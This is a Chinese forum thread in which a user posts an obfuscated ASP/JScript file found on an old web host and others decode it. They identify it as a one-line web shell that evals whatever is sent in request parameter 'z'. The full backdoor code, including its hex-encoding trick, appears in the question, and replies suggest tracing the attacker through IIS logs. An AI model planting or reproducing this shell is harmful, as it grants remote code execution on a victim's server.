谁能追踪出这个木马的黑客

水人 发布于 2016/09/11 19:24
阅读 799
收藏 0

一个老旧的ASP空间,多了个文件,貌似是个木马,大家看下,能不能追踪出这个木马的黑客。

搞不好这位兄台也在OSchina混呢

文件内容全数如下:

<script runat="server" language="JScript">
function exs(str) {
  var q = "u";
  var w = "afe";
  var a = q + "ns" + w;
  var b= /*///*/eval(str,a);
  return(b);
   }
function dec(str,key) {
  var k,q,t;
  var s="";
  var p="";
  for(k = 0; k < str.length; k=k+2)
  {
    t = ((k+2)/2) % key.length;
    p = key.substr(t, 1);
    if (isFinite(str.substr(k, 1)))
    {
      q = "0x"+ str.substr(k, 2);
      s = s + char(int(q)-p);// + "|" + p +"|";
    }
    else
    {
      q = "0x"+ str.substr(k, 4);
      s = s + char(int(q)-p);
      k = k+2;
    }
  }
  return(s);
   }
</script>
<%
exs(exs(dec("556675766874782F4C75696E5E237E2360","1314"))); 
%>

加载中
0
NickWilde
NickWilde

这段代码看起来是javascript用firebug 运行了下 有语法错误所以应该是无用了,不过替换了几个函数 跑出来 结果如下

function dec(str, key) {
  var k,
  q,
  t;
  var s = '';
  var p = '';
  for (k = 0; k < str.length; k = k + 2)
  {
    t = ((k + 2) / 2) % key.length;
    p = key.substr(t, 1);
    if (isFinite(str.substr(k, 1)))
    {
      q = '0x' + str.substr(k, 2);
      s = s + String.fromCharCode(parseInt(q) - p); // + "|" + p +"|";
    } 
    else
    {
      q = '0x' + str.substr(k, 4);
      s = s + String.fromCharCode(int(q) - p);
      k = k + 2;
    }
  }
  return (s);
}
var aa = dec("556675766874782F4C75696E5E237E2360","1314");
console.debug(aa);



Request.Item["z"]

水人
水人
回复 @凯风自南 : 所得寺内
凯风自南
这个程序我运行了,代码没有错。这个是微软的JScript不是js,如果你不是用的IE框架,就会报错。
0
_
_Yud

dec得到:Request.Item["z"]

exs: eval('', 'unsafe')执行Request.Item["z"]中指定的内容

_
_Yud
回复 @水人 : 类似javascript的语法. JScript
水人
水人
ASP不是很懂,本地也没ASP环境,搞不出来。。。
0
红烧土豆
红烧土豆
确定这个文件,然后去iis的日志中看看哪个ip访问这个文件了。
0
刚田武
刚田武
最简单的一句话后门,执行请求中的任何指令
返回顶部
顶部